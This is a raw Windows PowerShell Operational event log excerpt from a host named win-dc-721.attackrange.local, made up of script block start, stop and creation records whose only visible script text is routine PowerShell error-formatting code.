ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476557
Keywords=None
Message=Started invocation of ScriptBlock ID: b0a79fe4-156f-4990-8524-d6123003a444
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476556
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: b0a79fe4-156f-4990-8524-d6123003a444
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476555
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9757e658-2a2e-4ecf-8ba9-03ef4a39c5a1
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476554
Keywords=None
Message=Completed invocation of ScriptBlock ID: 99bb2c5e-73b5-446c-a340-d5b8edfc8005
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476553
Keywords=None
Message=Completed invocation of ScriptBlock ID: f0d1c1e6-cc16-4587-92d9-c26e3a9bb298
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476552
Keywords=None
Message=Started invocation of ScriptBlock ID: f0d1c1e6-cc16-4587-92d9-c26e3a9bb298
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476551
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: f0d1c1e6-cc16-4587-92d9-c26e3a9bb298
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476550
Keywords=None
Message=Started invocation of ScriptBlock ID: 99bb2c5e-73b5-446c-a340-d5b8edfc8005
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476549
Keywords=None
Message=Started invocation of ScriptBlock ID: 9757e658-2a2e-4ecf-8ba9-03ef4a39c5a1
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476548
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 9757e658-2a2e-4ecf-8ba9-03ef4a39c5a1
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476547
Keywords=None
Message=Started invocation of ScriptBlock ID: 65a845d7-c977-4a03-a4b4-59c48289733a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476546
Keywords=None
Message=Completed invocation of ScriptBlock ID: df8b432c-8d06-42d2-a4f3-2eae79ea7526
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476545
Keywords=None
Message=Started invocation of ScriptBlock ID: df8b432c-8d06-42d2-a4f3-2eae79ea7526
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476761
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476760
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476759
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476758
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476757
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476756
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476755
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476754
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476753
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476752
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476751
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476750
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476749
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476748
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476747
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476746
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476745
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476744
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476743
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476742
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476741
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476740
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476739
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476738
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476737
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476736
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476735
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476734
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476733
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476732
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476731
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476730
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476729
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476728
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476727
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476726
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476725
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476724
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476723
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476722
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476721
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5b8e7e08-1173-40d7-bb93-0e6033fd0ab6
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476720
Keywords=None
Message=Started invocation of ScriptBlock ID: 5b8e7e08-1173-40d7-bb93-0e6033fd0ab6
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
